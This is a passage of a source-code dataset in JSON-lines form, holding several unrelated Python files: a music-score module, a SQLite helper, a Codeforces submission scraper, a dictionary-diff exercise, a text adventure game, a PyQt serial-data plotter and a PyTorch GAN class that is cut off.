Raise IndexError if timepos\n is after the last bar.\n \"\"\"\n for bar in self.m_bars:\n if bar.m_timepos <= timepos < bar.end():\n return bar\n if bar.m_timepos > timepos:\n return IndexError(timepos)\n raise IndexError(timepos)\n def get_timelist(self):\n data = {}\n for staff_idx, staff in enumerate(self.m_staffs):\n for voice_idx, voice in enumerate(staff.m_voices):\n for timepos in voice.m_tdict:\n n = voice.m_tdict[timepos]['elem'][0]\n if isinstance(n, Note):\n if timepos not in data:\n data[timepos] = {'start': set(), 'end': set()}\n if n.m_tieinfo not in ('go', 'end'):\n data[timepos]['start'].add((staff_idx, voice_idx))\n if n.m_tieinfo in (None, 'end'):\n endpos = timepos + n.m_duration.get_rat_value()\n if endpos not in data:\n data[endpos] = {'start': set(), 'end': set()}\n data[endpos]['end'].add((staff_idx, voice_idx))\n retval = []\n v = sorted(data)[:]\n ppos = Rat(0, 1)\n voices = set()\n for timepos in v:\n if data[timepos]['start'] and data[timepos]['end']:\n for voice in data[timepos]['end']:\n voices.remove(voice)\n for voice in data[timepos]['start']:\n voices.add(voice)\n assert voices\n retval.append([True, timepos - ppos])\n ppos = timepos\n elif data[timepos]['start']:\n if not voices:\n if (timepos != ppos):\n retval.append([False, timepos - ppos])\n ppos = timepos\n else:\n retval.append([True, timepos - ppos])\n ppos = timepos\n for voice in data[timepos]['start']:\n voices.add(voice)\n elif data[timepos]['end']:\n for voice in data[timepos]['end']:\n voices.remove(voice)\n if not voices:\n retval.append([True, timepos - ppos])\n ppos = timepos\n return retval\n @staticmethod\n def concat(s1, s2):\n \"\"\"\n Concatenate the two scores, and return a new score. Both scores\n need to have the exact same staff and voice layout.\n \"\"\"\n assert isinstance(s1, Score)\n assert isinstance(s2, Score)\n if len(s1.m_staffs) != len(s2.m_staffs):\n raise Score.StaffCountException()\n if [type(x) for x in s1.m_staffs] != [type(x) for x in s2.m_staffs]:\n raise Score.StaffTypeException()\n for st1, st2 in zip(s1.m_staffs, s2.m_staffs):\n if len(st1.m_voices) != len(st2.m_voices):\n raise Score.VoiceCountException()\n ret = s1.copy()\n if not s1.m_staffs:\n return s1\n # do the adding\n for bar in s2.m_bars:\n bar.m_timepos = ret.m_bars[-1].end()\n ret.m_bars.append(bar)\n ret.create_shortcuts()\n if s1.m_bars:\n start = s1.m_bars[-1].end()\n else:\n start = Rat(0, 1)\n s2.create_shortcuts() # FIXME why?\n for staff_idx, staff in enumerate(s1.m_staffs):\n for voice_idx in range(len(staff.m_voices)):\n for k in s2.m_staffs[staff_idx].m_voices[voice_idx].m_tdict:\n ret.m_staffs[staff_idx].m_voices[voice_idx].m_tdict[k + start] = s2.m_staffs[staff_idx].m_voices[voice_idx].m_tdict[k]\n return ret\n @staticmethod\n def concat2(s1, s2):\n \"\"\"\n Return a new Score object concatenating the two scores. This is\n intended return value is intended for playback only, since the\n staffs placed below each other. 
So the first score will have empty\n bars at the end, and the last score will have empty bars at the\n beginning.\n \"\"\"\n assert isinstance(s1, Score)\n assert isinstance(s2, Score)\n ret = s1.copy()\n if s1.m_bars:\n start = s1.m_bars[-1].end()\n else:\n start = Rat(0, 1)\n for bar in s2.m_bars:\n ret.m_bars.append(Bar(bar.m_timesig, ret.m_bars[-1].end()))\n for staff_idx, staff in enumerate(s2.m_staffs):\n ret.add_staff(staff_class=staff.__class__)\n for k in staff.m_tdict:\n ret.m_staffs[-1].m_tdict[start + k] = staff.m_tdict[k]\n for voice_idx in range(len(staff.m_voices)):\n if voice_idx != 0:\n ret.m_staffs[-1].add_voice()\n # This line make the music from sc2 continue after the\n # point where the music from sc1 ends.\n ret.m_staffs[-1].m_voices[-1].m_length = s1.m_bars[-1].end()\n for elem in s2.m_staffs[staff_idx].m_voices[voice_idx]:\n ret.m_staffs[-1].m_voices[-1].append(elem['elem'])\n ret.create_shortcuts()\n return ret\n def __deepcopy__(self, memo):\n ret = Score()\n ret.m_bars = copy.deepcopy(self.m_bars)\n return ret\n","repo_name":"rannyeribaptist/Solfege","sub_path":"solfege/mpd/elems.py","file_name":"elems.py","file_ext":"py","file_size_in_byte":46216,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"12594662029","text":"from db.db import get_cursor, commit_db\nfrom uuid import uuid4\nfrom json import dumps\n\nCREATE_TABLE_PROJECTS_SQL = \"\"\"\nCREATE TABLE IF NOT EXISTS projects (\n uuid GUID PRIMARY KEY ,\n id INTEGER unique,\n name TEXT unique,\n build_branch varchar,\n pipeline_steps json, \n pipeline_envs json, \n info json )\"\"\"\n\nSELECT_PROJECTS_SQL = \"\"\" SELECT * from projects LIMIT ? OFFSET ? \"\"\"\n\nINSERT_PROJECT_SQL = \"\"\" INSERT INTO projects(uuid, id, 'name', info) VALUES(?,?,?,?) \"\"\"\n\n\ndef get_projects(**kwargs):\n page = kwargs['page'] if 'page' in kwargs else 10\n page_size = kwargs['page_size'] if 'page_size' in kwargs else 0\n print(page)\n print(page_size)\n return get_cursor().execute(SELECT_PROJECTS_SQL, (page, page_size * page)).fetchall()\n\n\ndef add_project(project):\n # https://docs.gitlab.com/ee/api/projects.html#get-single-project\n print(\"add_project\")\n print(project)\n uuid = uuid4()\n name = project['path_with_namespace']\n id = project['id']\n get_cursor().execute(INSERT_PROJECT_SQL, (str(uuid), int(id), name, dumps(project)))\n commit_db()\n\n\ndef get_project_by_id(id):\n return get_cursor().execute(\"Select * from projects where id= ? ;\", (str(id),)).fetchone()\n\n\ndef get_project_by_uuid(uuid):\n return get_cursor().execute(\"Select * from projects where uuid=? ;\", uuid)\n\n\ndef update_project_pipeline(id, branch, steps, env):\n # steps & env already stringified\n get_cursor().execute(\" UPDATE projects set build_branch= ?, pipeline_steps= ?, pipeline_envs= ? where id=? 
\",\n (branch, steps, env, id))\n commit_db()\n","repo_name":"380sq/minim","sub_path":"db/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32972480091","text":"# download CF submissions\n# use with 'python3 grader.py -g ok'\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport sys\nimport time\n\ndef parse(url):\n\tpage = urllib.request.urlopen(url)\n\treturn BeautifulSoup(page,'html.parser')\n\nsep='-'*50\nprefix=\"https://codeforces.com/contest/\"\ncontest=\"1294\"\nprob=\"C\"\npage=\"130\"\n\ndef subs(page):\n\turl = prefix+contest+\"/status/\"+prob+\"/page/\"+page\n\tsoup = parse(url)\n\tsubs = soup.body.findAll('tr',attrs={'data-submission-id': True})\n\tL = []\n\tfor s in subs:\n\t\tL.append(s['data-submission-id'])\n\treturn L\n\nL = subs(page)\nfor sub in L:\n\turl = prefix+contest+\"/submission/\"+sub\n\tsoup = parse(url)\n\ttable = soup.body.find('table')\n\tcpp = None\n\tcnt = 0\n\tfor b in table.findAll('td'):\n\t\tcnt += 1\n\t\tif cnt == 4:\n\t\t\tlang = b.text.strip()\n\tname = \"\"\n\tif 'C++' in lang:\n\t\tname = sub+\".cpp\"\n\telif (\"Python\" in lang or \"PyPy\" in lang) and \"3\" in lang:\n\t\tname = sub+\".py\"\n\telif \"Java\" in lang:\n\t\tname = sub+\".java\"\n\tif len(name) > 0:\n\t\tprog = soup.body.find('pre',attrs={'id':\"program-source-text\"}).text\n\t\tif 'C++' in lang:\n\t\t\tprog = prog.replace(\"%I64d\",\"%lld\")\n\t\t\tprog = prog.replace(\"ONLINE_JUDGE\",\"OJOJ\")\n\t\tif 'Java' in lang: # needs to be fixed\n\t\t\tname = \"j\"+name\n\t\t\tclen = 1\n\t\t\twhile clen < 100:\n\t\t\t\tdes = 'public'+(' '*clen)+'class '\n\t\t\t\tind = prog.find(des)\n\t\t\t\tif ind == -1:\n\t\t\t\t\tclen += 1\n\t\t\t\t\tcontinue\n\t\t\t\tL = ind+len(des)\n\t\t\t\twhile prog[L].isspace():\n\t\t\t\t\tL += 1\n\t\t\t\tR = L\n\t\t\t\twhile not prog[R].isspace() and prog[R] != '{':\n\t\t\t\t\tR += 1\n\t\t\t\tprog = prog[:L]+\"j\"+sub+prog[R:]\n\t\t\t\tbreak\n\t\t\tassert clen < 100, \"public class not found\"\n\t\twith open(name, \"w\") as f:\n\t\t\tf.write(prog)\n\t\tprint(sub+\": \"+lang+\", OK\")\n\telse:\n\t\tprint(sub+\": \"+lang+\", NOT OK\")\n\ttime.sleep(0.5)","repo_name":"bqi343/cp-notebook","sub_path":"Contests/Tools/CF/cf_subs.py","file_name":"cf_subs.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":2202,"dataset":"github-code","pt":"54"} +{"seq_id":"26666054781","text":"A = {\"one\": \"eon\", \"two\": \"two\", \"four\": True}\nB = {\"two\": \"own\", \"zero\": 4, \"four\": True}\n\ndef gen_diff(A, B):\n C = {}\n C.update(A)\n C.update(B)\n for key, value in A.items():\n if key in B.keys() and value in B.values():\n C.update({key: 'unchanged'})\n elif key in B.keys() and value not in B.values():\n C.update({key: 'changed'})\n elif key not in B.keys():\n C.update({key: 'deleted'})\n\n for key in B:\n if key not in A.keys():\n C.update({key: 'added'})\n\n return C\n\nprint(gen_diff(A, B))\n\n\n'''\nРеализуйте функцию gen_diff, которая сравнивает два словаря и возвращает результат сравнения в виде словаря. 
\nКлючами результирующего словаря будут все ключи из двух входящих, а значением строка с описанием отличий: \nadded, deleted, changed или unchanged.\n\nВозможные значения:\n\nadded — ключ отсутствовал в первом словаре, но был добавлен во второй\ndeleted — ключ был в первом словаре, но отсутствует во втором\n+++ changed — ключ присутствовал и в первом и во втором словаре, но значения отличаются\n+++ unchanged — ключ присутствовал и в первом и во втором словаре с одинаковыми значениями\nПример работы:\n\nfrom solution import gen_diff\n\ngen_diff(\n {\"one\": \"eon\", \"two\": \"two\", \"four\": True},\n {\"two\": \"own\", \"zero\": 4, \"four\": True},\n)\n# {\"one\": \"deleted\", \"two\": \"changed\", \"four\": \"unchanged\", \"zero\": \"added\"}\n'''","repo_name":"AntonTyurin87/hexlet-git","sub_path":"exercises/gen_diff.py","file_name":"gen_diff.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39334720009","text":"#from adventurelib import *\nimport adventurelib2 as a\nimport random\nimport PySimpleGUI as sg\na.Room.items = a.Bag()\n\n# each room shall have a image-filename attribute\n\ncurrent_room = starting_room = a.Room(\"\"\"\nYou are in a dark room.\n\"\"\", image=\"dark.png\")\n\n\nvalley = starting_room.north = a.Room(\"\"\"\nYou are in a beautiful valley.\n\"\"\", image=\"valley.png\")\n\nmagic_forest = valley.north = a.Room(\"\"\"\nYou are in a enchanted forest where magic grows wildly.\n\"\"\", image=\"forest.png\")\n\ncave = magic_forest.north = a.Room(\"\"\"\nYou are inside a dark cave.\nYou hear a waterfall nearby\"\"\", image=\"cave.png\")\n\n\nmallet = a.Item('rusty mallet', 'mallet')\nvalley.items = a.Bag({mallet,})\n\nwizard = a.Item('wizard', 'the wizard', 'a wizard')\nwizard.answers = [\"Geht so\", \"jaja\", \"akra-ka-babra!\"]\n\n# a bag is a python SET !!\nmagic_forest.items = a.Bag({wizard,}) # ITEMS must be in a bag\n\ninventory = a.Bag()\n\n\n@a.when('north', direction='north')\n@a.when('south', direction='south')\n@a.when('east', direction='east')\n@a.when('west', direction='west')\ndef go(direction):\n global current_room\n room = current_room.exit(direction)\n if room:\n current_room = room\n a.say('You go %s.' % direction)\n look()\n if room == magic_forest:\n a.set_context('magic_aura')\n else:\n a.set_context('default')\n\n\n@a.when('take ITEM')\ndef take(item):\n if item == \"wizard\":\n a.say(\"The wizard does not want to be picked up by you\")\n return\n obj = current_room.items.take(item)\n if obj:\n a.say('You pick up the %s.' % obj)\n inventory.add(obj)\n else:\n a.say('There is no %s here.' % item)\n\n@a.when(\"talk\", thing=None)\n@a.when(\"talk to\", thing=None)\n@a.when(\"talk THING\")\n@a.when(\"talk to THING\")\ndef talk(thing):\n if thing == None:\n a.say(\"You talk a bit to yourself\")\n return\n # check if the thing is in the inventory or in the current room\n # inventory and room.items are SET's. to merge them, I use pythons join command\n for i in inventory.union(current_room.items):\n if thing in i.aliases:\n exist = True\n break\n else:\n # else in a for loop means the whole loop was interrated trough, without any break\n a.say(\"there is no {} to talk to, neither in your inventory nor in this room/location\".format(thing))\n return\n # the thing exist. 
thing is a string, i is the object\n a.say(\"you talk to {}...\".format(thing))\n # check if object i (the item) has the .answers attribute\n if \"answers\" in i.__dict__.keys():\n a.say(\"and the {} says: '{}'\".format(thing, random.choice(i.answers)))\n else:\n a.say(\"but you get no reply. None at all. It seems that the {} is unable to talk\".format(thing))\n\n\n\n\n\n@a.when('drop THING')\ndef drop(thing):\n obj = inventory.take(thing)\n if not obj:\n a.say('You do not have a %s.' % thing)\n else:\n a.say('You drop the %s.' % obj)\n current_room.items.add(obj)\n\n\n@a.when('look')\ndef look():\n a.say(current_room)\n #a.say(\"image: {}\".format(current_room.image))\n if current_room.items:\n for i in current_room.items:\n a.say('A %s is here.' % i)\n\ndef command_list():\n return [c for c in commands]\n\ndef inventory_list():\n return [i for i in inventory]\n\n@a.when('inventory')\ndef show_inventory():\n a.say('You have:')\n for thing in inventory:\n a.say(thing)\n\n@a.when('cast', magic=None, context='magic_aura')\n@a.when(\"cast MAGIC\", context='magic_aura')\ndef cast(magic):\n if magic == None:\n a.say(\"Which magic you would like to spell?\")\n elif magic == \"fireball\":\n a.say(\"you cast a flaming Fireball! Woooosh....\")\n\n# ------------------ GUI ------------------\n\ndirections = [\n [sg.Text(\"\", size=(15,1)),sg.Button(\"North\", size=(10,1)), sg.Text(\"\",size=(15,1))],\n [sg.Button(\"West\", size=(10,1)),sg.Text(\"\", size=(15,1)),sg.Button(\"East\",size=(10,1))],\n [sg.Text(\"\", size=(15,1)),sg.Button(\"South\", size=(10,1)), sg.Text(\"\",size=(15,1))],\n [sg.Text(\"valid commands\", size=(20,1)), sg.Text(\"your items:\", size=(20,1))],\n [sg.Listbox(key=\"help\", size=(20,10), values=[]), sg.Listbox(key=\"inventory\", values=[], size=(20,10))] ,\n ]\n\nlayout = [\n [sg.Text(\"Adventure - press start to begin\", key=\"header\",)],\n [sg.Output(key=\"output\", size=(70,20)),sg.Col(layout=directions)],\n [sg.InputText(key=\"command\", size=(70, 2), do_not_clear=False),\n sg.Button(\"execute\", bind_return_key=True)],\n [sg.Button(\"Start\"), sg.Button(\"Cancel\"), sg.Button(\"test\")],\n ]\n\nwindow = sg.Window(title=\"Adventuregame\", layout=layout)\n\nwhile True:\n event, values = window.read()\n if event in [None, \"Cancel\"]:\n break\n if event == \"Start\":\n window[\"header\"].update(\"Game is running\")\n a.say(\"starting a new adventure\")\n #a.start()\n look()\n if event == \"execute\":\n a._handle_command(values[\"command\"].strip())\n if event == \"test\":\n ugly = a._available_commands()\n print(ugly)\n #for t in ugly:\n # print(t[0]])\n a.help()\n # update command and help list\n window[\"help\"].update(a.helplist())\n window[\"inventory\"].update(inventory_list())\n \nwindow.close()\nprint(\"bye\")\n\n# --------- adventure start ------\n\n","repo_name":"horstjens/adventure","sub_path":"horstgame2.py","file_name":"horstgame2.py","file_ext":"py","file_size_in_byte":5400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43135127860","text":"import sys\nfrom PyQt6 import QtCore, QtGui, QtWidgets\nimport serial\nimport pyqtgraph as pg\n\nser = serial.Serial('COM3', baudrate=9600, timeout=1)\n\n\ndef send_command(button_number):\n # İlk byte buton numarasına eşit olmalıdır.\n first_byte = button_number\n\n # İkinci byte, ilk byte'ın bitlerinin tersi olmalıdır.\n second_byte = ~button_number & 0xFF\n\n # 2 byte'lık paketi gönder\n ser.write(bytes([first_byte, second_byte]))\n\nclass 
MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self.setGeometry(30, 300, 400, 550)\n self.setWindowTitle(\"Real-Time Data Plotting\")\n self.graphWidget = pg.PlotWidget()\n self.setCentralWidget(self.graphWidget)\n self.graphWidget.setBackground('w')\n self.graphWidget.showGrid(x=True, y=True)\n self.graphWidget.setLabel('left', 'Values')\n self.graphWidget.setLabel('bottom', 'Time')\n self.graphWidget.setTitle('Real-Time Data Plotting')\n\n\n\n self.latitude = []\n self.longitude = []\n self.speed = []\n self.acceleration = []\n self.temperature = []\n self.time = []\n\n self.pen = pg.mkPen(color=(255, 0, 0))\n self.plotLatitude = self.graphWidget.plot(pen=self.pen)\n self.pen = pg.mkPen(color=(0, 255, 0))\n self.plotLongitude = self.graphWidget.plot(pen=self.pen)\n self.pen = pg.mkPen(color=(0, 0, 255))\n self.plotSpeed = self.graphWidget.plot(pen=self.pen)\n self.pen = pg.mkPen(color=(255, 255, 0))\n self.plotAcceleration = self.graphWidget.plot(pen=self.pen)\n self.pen = pg.mkPen(color=(255, 0, 255))\n self.plotTemperature = self.graphWidget.plot(pen=self.pen)\n\n def update_data(self, values):\n self.latitude.append(float(values[0]))\n self.longitude.append(float(values[1]))\n self.speed.append(float(values[2]))\n self.acceleration.append(float(values[3]))\n self.temperature.append(float(values[4]))\n self.time.append(float(len(self.time) + 1))\n\n self.plotLatitude.setData(self.time, self.latitude)\n self.plotLongitude.setData(self.time, self.longitude)\n self.plotSpeed.setData(self.time, self.speed)\n self.plotAcceleration.setData(self.time, self.acceleration)\n self.plotTemperature.setData(self.time, self.temperature)\n\n def closeEvent(self, event):\n sys.exit()\n\nclass DataThread(QtCore.QThread):\n def __init__(self, serial, window):\n super().__init__()\n self.serial = serial\n self.window = window\n self.running = True\n\n def run(self):\n while self.running:\n try:\n # Read line from serial port\n line = self.serial.readline().decode().strip()\n\n # Split line into values\n values = line.split(\",\")\n\n # Update data\n self.window.update_data(values)\n except:\n pass\n\n def stop(self):\n self.running = False\n self.wait()\n\nclass SerialPort(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n # Create widgets\n self.baudrate_label = QtWidgets.QLabel(\"Baudrate:\")\n self.baudrate_combo = QtWidgets.QComboBox()\n self.baudrate_combo.addItems([\"9600\", \"19200\", \"38400\", \"57600\", \"115200\"])\n self.connect_button = QtWidgets.QPushButton(\"Connect\")\n self.disconnect_button = QtWidgets.QPushButton(\"Disconnect\")\n self.disconnect_button.setEnabled(False)\n\n # Create layout\n hbox = QtWidgets.QHBoxLayout()\n hbox.addWidget(self.baudrate_label)\n hbox.addWidget(self.baudrate_combo)\n hbox.addWidget(self.connect_button)\n hbox.addWidget(self.disconnect_button)\n\n # Create plot widgets\n self.latitude_plot = pg.PlotWidget()\n self.longitude_plot = pg.PlotWidget()\n self.speed_plot = pg.PlotWidget()\n self.acceleration_plot = pg.PlotWidget()\n self.temperature_plot = pg.PlotWidget()\n\n # Create layout for plot widgets\n plot_layout = QtWidgets.QGridLayout()\n plot_layout.addWidget(self.latitude_plot, 0, 0)\n plot_layout.addWidget(self.longitude_plot, 0, 1)\n plot_layout.addWidget(self.speed_plot, 1, 0)\n plot_layout.addWidget(self.acceleration_plot, 1, 1)\n plot_layout.addWidget(self.temperature_plot, 2, 0, 1, 2)\n\n # Set layout for main window\n vbox = QtWidgets.QVBoxLayout()\n 
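# Hedged sketch of the receiving side of the 2-byte packet built by
# send_command() at the top of this file: the first byte is the button
# number and the second byte must be its bitwise complement. The function
# name and the `port` argument are assumptions made for illustration.
def read_command(port):
    packet = port.read(2)
    if len(packet) != 2:
        return None  # timeout or incomplete packet
    first, second = packet[0], packet[1]
    # accept the packet only if the complement check holds
    if second == (~first & 0xFF):
        return first
    return None  # corrupted packet, discard it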
vbox.addLayout(hbox)\n vbox.addLayout(plot_layout)\n self.setLayout(vbox)\n\n # Connect signals and slots\n self.connect_button.clicked.connect(self.connect_serial)\n self.disconnect_button.clicked.connect(self.disconnect_serial)\n\n def connect_serial(self):\n # Get selected baud rate\n baudrate = int(self.baudrate_combo.currentText())\n\n try:\n # Connect to serial port\n self.serial = serial.Serial('/dev/ttyACM0', baudrate)\n\n # Disable connect button and enable disconnect button\n self.connect_button.setEnabled(False)\n self.disconnect_button.setEnabled(True)\n\n # Create data thread and start it\n self.data_thread = DataThread(self.serial, self)\n self.data_thread.start()\n except serial.SerialException as e:\n QtWidgets.QMessageBox.critical(self, \"Error\", str(e))\n\n def disconnect_serial(self):\n # Stop data thread\n self.data_thread.stop()\n\n # Disconnect from serial port\n self.serial.close()\n\n # Enable connect button and disable disconnect button\n self.connect_button.setEnabled(True)\n self.disconnect_button.setEnabled(False)\n\n def update_data(self, values):\n # Update latitude plot\n self.latitude_plot.plot(values[0])\n\n # Update longitude plot\n self.longitude_plot.plot(values[1])\n\n # Update speed plot\n self.speed_plot.plot(values[2])\n\n # Update acceleration plot\n self.acceleration_plot.plot(values[3])\n\n # Update temperature plot\n self.temperature_plot.plot(values[4])\n\nclass SensorDataPlot(QtWidgets.QWidget):\n def init(self):\n super().init()\n self.init_ui()\n\n def init_ui(self):\n # Create latitude plot\n self.latitude_plot = pg.PlotWidget(title=\"Latitude\")\n self.latitude_plot.setLabel(\"left\", \"Latitude\", units=\"degrees\")\n self.latitude_plot.showGrid(x=True, y=True)\n\n # Create longitude plot\n self.longitude_plot = pg.PlotWidget(title=\"Longitude\")\n self.longitude_plot.setLabel(\"left\", \"Longitude\", units=\"degrees\")\n self.longitude_plot.showGrid(x=True, y=True)\n\n # Create speed plot\n self.speed_plot = pg.PlotWidget(title=\"Speed\")\n self.speed_plot.setLabel(\"left\", \"Speed\", units=\"m/s\")\n self.speed_plot.showGrid(x=True, y=True)\n\n # Create acceleration plot\n self.acceleration_plot = pg.PlotWidget(title=\"Acceleration\")\n self.acceleration_plot.setLabel(\"left\", \"Acceleration\", units=\"m/s^2\")\n self.acceleration_plot.showGrid(x=True, y=True)\n\n # Create temperature plot\n self.temperature_plot = pg.PlotWidget(title=\"Temperature\")\n self.temperature_plot.setLabel(\"left\", \"Temperature\", units=\"°C\")\n self.temperature_plot.showGrid(x=True, y=True)\n\n # Create layout\n grid = QtWidgets.QGridLayout()\n grid.addWidget(self.latitude_plot, 0, 0)\n grid.addWidget(self.longitude_plot, 0, 1)\n grid.addWidget(self.speed_plot, 1, 0)\n grid.addWidget(self.acceleration_plot, 1, 1)\n grid.addWidget(self.temperature_plot, 2, 0, 1, 2)\n self.setLayout(grid)\n\n def update_data(self, values):\n # Update latitude plot\n self.latitude_plot.plot(values[0])\n\n # Update longitude plot\n self.longitude_plot.plot(values[1])\n\n # Update speed plot\n self.speed_plot.plot(values[2])\n\n # Update acceleration plot\n self.acceleration_plot.plot(values[3])\n\n # Update temperature plot\n self.temperature_plot.plot(values[4])\n\nclass DataWindow(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n def init_ui(self):\n # Create plots\n\n self.latitude_plot = PlotWidget(\"Latitude\")\n self.longitude_plot = PlotWidget(\"Longitude\")\n self.speed_plot = PlotWidget(\"Speed\")\n self.acceleration_plot = 
PlotWidget(\"Acceleration\")\n self.temperature_plot = PlotWidget(\"Temperature\")\n\n # Create layout\n grid = QtWidgets.QGridLayout()\n grid.addWidget(self.latitude_plot, 0, 0)\n grid.addWidget(self.longitude_plot, 0, 1)\n grid.addWidget(self.speed_plot, 1, 0)\n grid.addWidget(self.acceleration_plot, 1, 1)\n grid.addWidget(self.temperature_plot, 2, 0, 1, 2)\n\n # Set layout\n self.setLayout(grid)\n def update_data(self, values):\n # Update latitude plot\n self.latitude_plot.plot(values[0])\n\n # Update longitude plot\n self.longitude_plot.plot(values[1])\n\n # Update speed plot\n self.speed_plot.plot(values[2])\n\n # Update acceleration plot\n self.acceleration_plot.plot(values[3])\n\n # Update temperature plot\n self.temperature_plot.plot(values[4])\n\nclass SecondWindow(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n # Eve Dön Butonu\n btn1 = QtWidgets.QPushButton('Eve Dön', self)\n btn1.move(30, 50)\n btn1.resize(100, 50)\n btn1.clicked.connect(lambda: self.sendCommand(1))\n\n # Görüntü Al Butonu\n btn2 = QtWidgets.QPushButton('Görüntü Al', self)\n btn2.move(150, 50)\n btn2.resize(100, 50)\n btn2.clicked.connect(lambda: self.sendCommand(2))\n\n # Hızlan Butonu\n btn3 = QtWidgets.QPushButton('Hızlan', self)\n btn3.move(270, 50)\n btn3.resize(100, 50)\n btn3.clicked.connect(lambda: self.sendCommand(3))\n\n # Eve Dön butonu fonksiyonu\n def eve_don(self):\n send_command(0x01) # 0x01 değeri \"Eve Dön\" butonunun numarasıdır.\n\n # Görüntü Al butonu fonksiyonu\n def goruntu_al(self):\n send_command(0x02) # 0x02 değeri \"Görüntü Al\" butonunun numarasıdır.\n\n # Hızlan butonu fonksiyonu\n def hizlan(self):\n send_command(0x03) # 0x03 değeri \"Hızlan\" butonunun numarasıdır.\n\n self.setGeometry(30, 20, 400, 150)\n self.setWindowTitle('Araç Kontrol Arayüzü')\n\nclass PlotWidget(QtWidgets.QWidget):\n def __init__(self, title):\n super().__init__()\n self.init_ui(title)\n\n def init_ui(self, title):\n # Create plot widget\n self.plot_widget = pg.PlotWidget(title=title)\n\n # Create plot curve\n self.plot_curve = self.plot_widget.plot()\n\n # Create layout\n vbox = QtWidgets.QVBoxLayout()\n vbox.addWidget(self.plot_widget)\n # Set layout\n self.setLayout(vbox)\n\n def plot(self, value):\n # Get current data from plot curve\n x_data, y_data = self.plot_curve.getData()\n\n # Add new data to plot curve\n x_data = pg.np.append(x_data, x_data[-1] + 1)\n y_data = pg.np.append(y_data, value)\n self.plot_curve.setData(x=x_data, y=y_data)\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = MainWindow()\n window2 = SecondWindow()\n serial_port = SerialPort()\n window.show()\n window2.show()\n serial_port.show()\n sys.exit(app.exec())\n","repo_name":"cagdassozturk/codes","sub_path":"yarışma.py","file_name":"yarışma.py","file_ext":"py","file_size_in_byte":11754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70276868641","text":"import torch\nfrom torch import nn\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom _param_dicts import *\nimport random\nimport numpy as np\n\n\nclass Discriminator(nn.Module):\n \"\"\"\n Discriminator\n\n Overall architecture:\n - 5 inputs\n - 128 neurons (ReLU with dropout 0.2)\n - 1024 neurons (Tanh with dropout 0.4)\n - 256 neurons (ReLU)\n - 1 output (sigmoid)\n\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.model = nn.Sequential(\n nn.Linear(5, 128), # 5 inputs\n nn.ReLU(),\n nn.Dropout(0.2),\n 
nn.Linear(128, 1024),\n nn.Tanh(),\n nn.Dropout(0.3),\n nn.Linear(1024, 256),\n nn.ReLU(),\n nn.Linear(256, 1), # 1 output\n nn.Sigmoid()\n )\n\n def forward(self, x):\n return self.model(x)\n \n\nclass Generator(nn.Module):\n \"\"\"\n Generator\n \n Overall architecture:\n - 5 inputs\n - 128 neurons (ReLU with dropout 0.2)\n - 256 neurons (Tanh with dropout 0.4)\n - 1024 neurons (ReLU)\n - 5 outputs\n\n \"\"\"\n def __init__(self):\n\n\n super().__init__()\n self.model = nn.Sequential(\n nn.Linear(5, 128), # 5 inputs\n nn.ReLU(),\n nn.Dropout(0.2),\n nn.Linear(128, 256),\n nn.Tanh(),\n nn.Dropout(0.3),\n nn.Linear(256, 1024),\n nn.ReLU(),\n nn.Linear(1024, 5) # 5 outputs\n )\n\n def forward(self, x):\n return self.model(x)\n \n\nclass GAN():\n def __init__(\n self, \n data,\n train_size=0.8,\n epochs=300,\n batch_size=128,\n lr=0.001,\n b1=0.9,\n b2=0.999,\n clip_value=None,\n random_state=None\n ):\n \"\"\"\n Parameters:\n \n data : array-like, shape (n_samples, 6)\n data of log returns to train on\n final dimension is the label\n - 0 = fake\n - 1 = real\n\n train_size: : float, optional, default=0.8\n size of the training set\n\n epochs: : int, optional, default=1000\n number of epochs during training\n\n batch_size: : int, optional, default=128\n batch size for training\n\n lr: : float, optional, default=0.001\n learning rate for the optimizer\n\n b1: : float, optional, default=0.9\n beta 1 (for Adam optimizer)\n\n b2: : float, optional, default=0.999\n beta 2 (for Adam optimizer)\n\n clip_value: : float, optional, default=None\n clip value for the weights of the discriminator\n\n random_state: : int, optional, default=None\n random state for reproducibility\n\n Attributes:\n\n train_set : training set of length train_size * n_samples\n\n test_set : test set of length (1 - train_size) * n_samples\n\n device : device to use (GPU or CPU)\n\n generator : generator model\n\n discriminator : discriminator model\n\n adversarial_loss : loss function (binary cross entropy loss)\n\n optimizer_G : optimizer for the generator (Adam optimizer)\n\n optimizer_D : optimizer for the discriminator (Adam optimizer)\n\n\n Methods:\n\n train(self, verbose) : trains the model\n verbose : int, optional, default=False\n if 1, prints the loss at each epoch\n if 2, prints the loss at each batch\n\n sample(self, n_samples) : generates n_samples of fake data\n\n\n \"\"\"\n\n if random_state is not None:\n torch.manual_seed(random_state)\n \n self.data = torch.tensor(data.values).float()\n\n self.train_size = train_size\n \n self.train_set, self.test_set = torch.utils.data.random_split(self.data,\n [\n int(len(self.data) * self.train_size),\n len(self.data) - int(len(self.data) * self.train_size)\n ]\n )\n \n self.epochs = epochs \n self.batch_size = batch_size \n self.lr = lr \n self.b1 = b1 \n self.b2 = b2 \n \n self.clip_value = clip_value \n \n \n self.device = torch.device(\n \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n ) # if GPU is available, use it\n\n self.generator = Generator().to(self.device)\n self.discriminator = Discriminator().to(self.device)\n self.adversarial_loss = nn.BCELoss() # binary cross entropy loss\n\n 